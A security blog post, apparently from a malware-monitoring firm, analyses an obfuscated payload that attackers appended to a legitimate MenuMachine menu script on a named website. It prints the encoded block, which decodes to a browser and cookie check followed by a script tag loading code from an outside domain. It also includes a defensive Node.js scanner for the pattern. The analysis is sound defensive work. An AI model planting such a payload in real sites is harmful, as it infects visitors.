When Benign Scripts Attack – IV

    We have received many requests to continue this series of posts, which tries to capture how hackers are injecting malware into benign scripts in the hope of hiding their malicious content amongst good code.

    This particular example shows how a MenuMachine script (menumachine.js) was used by a hacker to spread malicious code. It is a little different from the ones we have posted before: the malicious code is not dropped in as a plain iframe or as easily readable JavaScript. Instead, it shows hackers trying just a little harder by injecting code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

    /* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/
    
    _ud="undefined";
    
    if(typeof(bbMenu)==_ud)
      bbMenu=new Array();
    
    bb_fix=new Array();
    
    function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
    {
      if(typeof(__pg)==_ud)
      {
        _b=new __bbBrChk();
        _hr=null;
    
        if(_b.ieDom&&!_b.mac){
          var els=document.getElementsByTagName("base");
    
          if(els.length){
            _hr=els[0].getAttribute("href");
          }
        }
    
        if(!_hr)
          _hr="";
    
        __pg=new _bbPg();
    
    **code removed for brevity**
    
        for(var g=0;g<bbMenu.length;g++)
          bbMenu[g].off();
      }
    
      __bbMmB=1;
      _bbUld(); 
    }
    
    function _bbPg()
    {
      var t=this;
      t.wn=window;
      t.d=t.wn.document;
      t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
      t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
      t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
    }
    
    **malicious code**
    
    <!--
    (function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
    3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
    ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
    @66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
    0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
    30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
    @3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
    61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
    2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
    @75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
    @3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
    )(/\@/g);
    -->
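    As an added example (not code from the original post), here is a small Node.js scanner for the pattern shown above: a legitimate script with an obfuscated block appended inside an HTML comment, a separator character swapped to '%' just before unescape(), and eval() of the result. The file it scans is a constructed, harmless stand-in; the tag names, the token threshold of 6 and the function names are assumptions of this example.

```javascript
// Added example for this post; the sample script below is constructed, not
// the injected code from the page. Regex literal whose body is one escaped
// non-word char, e.g. /\@/g: the separator swapped for '%' before unescape().
const SEP_REGEX = /\/\\?([^\w\/\\])\/g/;
const REPLACE_TO_PERCENT = /\.replace\([^,()]+,\s*['"]%['"]\)/;

function escapeForRegex(ch) {
  return ch.replace(/[.*+?^${}()|[\]\\\/]/g, '\\$&');
}

// Returns a list of tags; an empty list means nothing suspicious was seen.
function scanScript(src) {
  const findings = [];
  // 1. Injected block appended after the real code inside an HTML comment.
  if (/<!--[\s\S]*-->\s*$/.test(src)) findings.push('trailing-html-comment');
  // 2. A custom separator is rewritten to '%' so unescape() can decode it.
  const sep = src.match(SEP_REGEX);
  if (sep && REPLACE_TO_PERCENT.test(src)) findings.push('separator-to-percent');
  // 3. Decode-then-execute: eval() together with unescape().
  if (/\beval\(/.test(src) && /\bunescape\(/.test(src)) findings.push('eval-unescape');
  // 4. Many "<sep>hh" tokens in one file; the threshold of 6 is arbitrary.
  const ch = sep ? sep[1] : '@';
  const tokens = src.match(new RegExp(escapeForRegex(ch) + '[0-9a-f]{2}', 'gi')) || [];
  if (tokens.length >= 6) findings.push('dense-escape-tokens');
  return findings;
}

// Decode %hh sequences without the deprecated global unescape().
function decodePercent(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Undo the separator trick on the longest single-quoted literal in the file
// so an analyst can read the appended block. Null when the pattern is absent.
function peelLayer(src) {
  const sep = src.match(SEP_REGEX);
  if (!sep) return null;
  const literals = src.match(/'[^']*'/g) || [];
  if (literals.length === 0) return null;
  const encoded = literals.reduce((a, b) => (b.length > a.length ? b : a)).slice(1, -1);
  return decodePercent(encoded.split(sep[1]).join('%'));
}

// Constructed sample: a menu script with a harmless obfuscated block appended;
// the hidden payload decodes to an alert() call, nothing more.
const SAMPLE = [
  '/* menu.js - constructed stand-in for a legitimate menu script */',
  'function showMenu(id){document.getElementById(id).style.display="block";}',
  '<!--',
  "(function(sep){var s='@61lert(@22con@73truct@65d@20sa@6dple@22@29';",
  "var d=s.replace(sep,'%');eval(unescape(d))})(/\\@/g);",
  '-->',
].join('\n');
```

    Run it as `node scan.js` after adding `console.log(scanScript(SAMPLE), peelLayer(SAMPLE))`; the same functions can be pointed at every .js file on a site to find scripts that gained a trailing commented block since the last known-good backup.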
    

    Till next time...

    • […] Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here. […]

      Posted by Hackers understand the value of backups – stopthehacker.com – Jaal, LLC on May 9th